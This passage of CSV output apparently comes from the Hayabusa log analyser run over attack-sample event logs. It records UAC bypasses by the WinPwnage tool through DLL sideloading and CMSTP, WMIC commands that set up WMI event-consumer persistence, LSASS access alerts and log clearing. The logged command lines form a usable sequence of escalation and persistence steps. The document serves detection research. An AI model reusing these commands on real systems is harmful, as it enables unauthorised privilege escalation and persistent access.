File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:13.494 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:13.509 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:18.404 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2780 | PGUID: 365ABB72-9ADA-5CD6-0000-001012231700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:18.654 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 3448 | PGUID: 365ABB72-9ADA-5CD6-0000-0010603C1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:26.779 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2936 | PGUID: 365ABB72-9AE2-5CD6-0000-00106D631700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:27.018 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:27.030 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\ehome\CRYPTBASE.dll | Process: C:\Windows\ehome\Mcx2Prov.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-12 01:46:10.125 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx 2019-05-12 01:46:10.344 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx 2019-05-12 01:46:10.344 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx 2019-05-12 01:46:15.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx 2019-05-12 01:46:15.547 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx 2019-05-12 01:46:20.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3756 | PGUID: 365ABB72-FC5C-5CD6-0000-001045DB1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx 2019-05-12 01:46:20.828 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 1256 | PGUID: 365ABB72-FC5C-5CD6-0000-0010E9F61200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx 2019-05-12 01:46:26.203 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\migwiz\CRYPTBASE.dll | Process: C:\Windows\System32\migwiz\migwiz.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3240 | PGUID: 365ABB72-FC61-5CD6-0000-0010141A1300 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx 2019-05-12 01:54:02.071 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx 2019-05-12 01:54:02.305 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx 2019-05-12 01:54:02.305 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx 2019-05-12 01:54:07.508 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx 2019-05-12 01:54:07.524 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx 2019-05-12 01:54:12.493 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3688 | PGUID: 365ABB72-FE34-5CD6-0000-0010EB2E1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx 2019-05-12 01:54:12.821 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 4000 | PGUID: 365ABB72-FE34-5CD6-0000-0010B8481700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx 2019-05-12 01:54:18.069 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\CRYPTBASE.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2572 | PGUID: 365ABB72-FE39-5CD6-0000-001012701700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx 2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx 2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: | IP Addr: ::1 | LID: 0x1bbdce | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx 2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx 2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx 2019-05-12 02:28:17.176 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx 2019-05-12 02:28:17.363 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp.ini | Process: c:\python27\python.exe | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx 2019-05-12 02:28:19.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini | Process: C:\Windows\System32\cmstp.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | LID: 0x13765 | PID: 3840 | PGUID: 365ABB72-0633-5CD7-0000-0010C6A02100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx 2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx 2019-05-12 02:28:22.598 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x1371b | PID: 544 | PGUID: 365ABB72-0636-5CD7-0000-0010A6C72100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx 2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,Evas | Exec,CMSTP Execution Registry Event,,../hayabusa-rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx 2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx 2019-05-12 02:57:49.903 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 3140 | PGUID: 365ABB72-0D1D-5CD7-0000-001020EF1500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:22.809 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 1832 | PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:23.215 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3184 | PGUID: 365ABB72-0D3F-5CD7-0000-0010DB251600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:23.340 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:23.418 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:23.450 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3196 | PGUID: 365ABB72-0D3F-5CD7-0000-00108B381600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:23.590 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 1616 | PGUID: 365ABB72-0D3F-5CD7-0000-001089471600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:39.746 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:50.090 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -Embedding | LID: 0x3e7 | PID: 2544 | PGUID: 365ABB72-0D5A-5CD7-0000-001069031700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 444 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010F4570000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:54.887 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 2432 | PGUID: 365ABB72-0D5E-5CD7-0000-0010A1141700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:54.903 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:54.981 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:55.028 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 4084 | PGUID: 365ABB72-0D5E-5CD7-0000-0010E6241700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:55.090 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx 2019-05-12 02:58:55.153 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3016 | PGUID: 